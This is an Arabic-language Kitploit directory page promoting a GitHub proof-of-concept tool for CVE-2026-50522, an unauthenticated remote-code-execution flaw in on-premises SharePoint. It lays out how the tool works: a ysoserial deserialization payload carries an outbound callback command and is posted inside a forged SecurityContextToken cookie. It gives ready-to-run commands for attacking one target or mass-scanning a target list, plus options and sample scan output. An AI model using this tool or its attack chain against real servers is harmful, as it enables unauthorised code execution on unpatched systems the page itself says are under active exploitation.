Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-50522 — إثبات المفهوم لـ CVE-2026-50522 | Kitploit
أدوات/GitHubGitHub/4minx/cve-2026-50522
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالفريق الأحمر
GitHub4minx/cve-2026-50522

CVE-2026-50522

إثبات المفهوم لـ CVE-2026-50522

عرض المستودع
38172منذ 25 أيامتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-50522 Poc : استغلال إلغاء تسلسل SharePoint لتنفيذ الأكواد عن بُعد

تنفيذ تعليمات برمجية عن بُعد دون مصادقة على خادم SharePoint عبر إلغاء تسلسل ملف تعريف الارتباط SecurityContextToken

أداة استغلال للمسح الجماعي لثغرة CVE-2026-50522 التي تستهدف خادم Microsoft SharePoint المحلي (on-premises). تستغل عملية إلغاء التسلسل غير الآمنة في BinaryFormatter داخل نقطة نهاية WS-Federation في /_trust/default.aspx لتحقيق تنفيذ أوامر دون مصادقة عبر ملفات تعريف ارتباط SecurityContextToken مُصنّعة.

ملاحظة: يتضمن هذا المشروع أداة ysoserial المعروفة في اختبار الاختراق، لذا قد يضعها برنامج مكافحة الفيروسات لديك في الحجر الصحي أو يحذّر منها أثناء التنزيل.


معلومات الثغرة

  • CVE: CVE-2026-50522
  • النوع: CWE-502 إلغاء تسلسل بيانات غير موثوقة
  • CVSS 3.1: 9.8 (حرجة)
  • المصادقة: بدون مصادقة
  • المنتجات المتأثرة:
    • Microsoft SharePoint Server Subscription Edition (قبل 16.0.19725.20434)
    • Microsoft SharePoint Server 2019 (قبل 16.0.10417.20175)
    • Microsoft SharePoint Enterprise Server 2016 (قبل 16.0.5561.1001)

كيف يعمل

  1. يُنشئ ysoserial.exe حمولة مُسلسلة بصيغة BinaryFormatter باستخدام أداة TypeConfuseDelegate
  2. تنفّذ الحمولة الأمر Invoke-WebRequest إلى عنوان URL خارج النطاق (out-of-band) للاستدعاء الرجعي
  3. يتم ضغط البايتات الخام باستخدام خوارزمية deflate (zlib) وترميزها Base64 لتصبح قيمة ملف تعريف ارتباط
  4. يُغلَّف ملف تعريف الارتباط داخل بنية XML الخاصة بـ SecurityContextToken
  5. يُدمَج الرمز المميّز داخل RequestSecurityTokenResponse (WS-Federation)
  6. يتم إرسال معامل wresult عبر POST إلى /_trust/default.aspx
  7. يقوم SharePoint بإلغاء تسلسل الرمز المميّز، مما يؤدي إلى تنفيذ الأكواد داخل عملية عامل IIS

المتطلبات

  • Python 3.10+ مع مكتبة requests
  • ysoserial.net (تنزيل)
  • خادم استدعاء رجعي خارج النطاق (OOB) (Burp Collaborator أو interactsh أو OAST)

الاستخدام

استهداف هدف واحد

root@kitploit:~
python CVE-2026-50522.py -t http://10.10.10.5 -c http://YOUR_ID.oastify.com

الفحص الجماعي

root@kitploit:~
python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com

مسار ysoserial مخصص

root@kitploit:~
python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com --ysoserial C:\tools\ysoserial.exe

مع استخدام وكيل (Proxy)

root@kitploit:~
python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com -x http://127.0.0.1:8080

وضع الاستدعاء عبر النطاق الفرعي

root@kitploit:~
python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com --callback-mode subdomain

الخيارات

الوسيطالوصفالافتراضي
-t, --targetعنوان URL لهدف واحد-
-T, --targetsملف يحتوي على عناوين URL للأهداف، سطر لكل هدف-
-c, --callback-urlعنوان URL الأساسي للاستدعاء الرجعي خارج النطاق (مطلوب)-
--callback-modepath أو subdomainpath
--ysoserialالمسار إلى ysoserial.exeysoserial.exe
-x, --proxyوكيل HTTPلا يوجد

أوضاع الاستدعاء الرجعي

وضع المسار (Path) (الافتراضي):

root@kitploit:~
http://YOUR_ID.oastify.com/10.10.10.5

وضع النطاق الفرعي (Subdomain):

root@kitploit:~
http://10.10.10.5.YOUR_ID.oastify.com

مثال على المخرجات

root@kitploit:~
[*] 50 target(s) | callback: http://abc123.oastify.com (path) | ysoserial: ysoserial.exe
[10.10.10.5] [+] 200 [LOGIN_PAGE,AUTH_COOKIE]
[10.10.10.6] [!] 200 [AMSI_BLOCKED]
[10.10.10.7] [!] TIMEOUT
[10.10.10.8] [!] SSL_ERR
[10.10.10.9] [!] 403 [HTTP_403]

[*] 45.2s | 50 total | 12 potential | 3 amsi | 5 failed

المراجع

  • Microsoft - CVE-2026-50522
  • SOCRadar - CVE-2026-50522 PoC يغذّي هجمات SharePoint
  • thehackernews - ثغرة SharePoint الحرجة RCE CVE-2026-50522 قيد الاستغلال النشط بعد نشر PoC
تنزيل الأداة